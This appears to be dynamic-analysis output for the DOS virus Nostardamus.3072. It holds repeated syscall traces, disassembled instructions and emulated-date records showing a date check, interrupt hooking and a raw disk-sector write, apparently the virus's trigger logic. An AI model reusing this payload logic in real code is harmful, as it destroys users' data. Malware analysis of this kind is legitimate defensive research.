Sample viewer

vx.netlux.org/Virus.DOS.Nostardamus.3072.a


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:38:25.198139784Z 42 PC: 144ec | Get date
0x144ec: inc al
0x144ee: shl al, 1
0x144f0: cmp dl, al
0x144f2: jne 0x14527
0x144f4: mov ah, 0x13
0x144f6: int 0x2f
0x144f8: push ds
0x144f9: push dx
0x144fa: mov ah, 0x13
0x144fc: int 0x2f
0x144fe: pop dx
0x144ff: pop ds
0x14500: mov ax, 0x2513
0x14503: int 0x21
0x14505: mov cx, 1
0x14508: mov dx, 0x580
0x1450b: mov ax, 0x308
0x1450e: int 0x13
0x14510: jb 0x1451f
0x14512: dec dh

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6571,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:50.661602525Z 42 PC: 144ec | Get date
0x144ec: inc al
0x144ee: shl al, 1
0x144f0: cmp dl, al
0x144f2: jne 0x14527
0x144f4: mov ah, 0x13
0x144f6: int 0x2f
0x144f8: push ds
0x144f9: push dx
0x144fa: mov ah, 0x13
0x144fc: int 0x2f
0x144fe: pop dx
0x144ff: pop ds
0x14500: mov ax, 0x2513
0x14503: int 0x21
0x14505: mov cx, 1
0x14508: mov dx, 0x580
0x1450b: mov ax, 0x308
0x1450e: int 0x13
0x14510: jb 0x1451f
0x14512: dec dh

{"DateBased":true,"Day":10,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6571,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:50.668454922Z 42 PC: 144ec | Get date
0x144ec: inc al
0x144ee: shl al, 1
0x144f0: cmp dl, al
0x144f2: jne 0x14527
0x144f4: mov ah, 0x13
0x144f6: int 0x2f
0x144f8: push ds
0x144f9: push dx
0x144fa: mov ah, 0x13
0x144fc: int 0x2f
0x144fe: pop dx
0x144ff: pop ds
0x14500: mov ax, 0x2513
0x14503: int 0x21
0x14505: mov cx, 1
0x14508: mov dx, 0x580
0x1450b: mov ax, 0x308
0x1450e: int 0x13
0x14510: jb 0x1451f
0x14512: dec dh
2018-12-25T11:59:50.670942052Z 37 PC: 14505 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')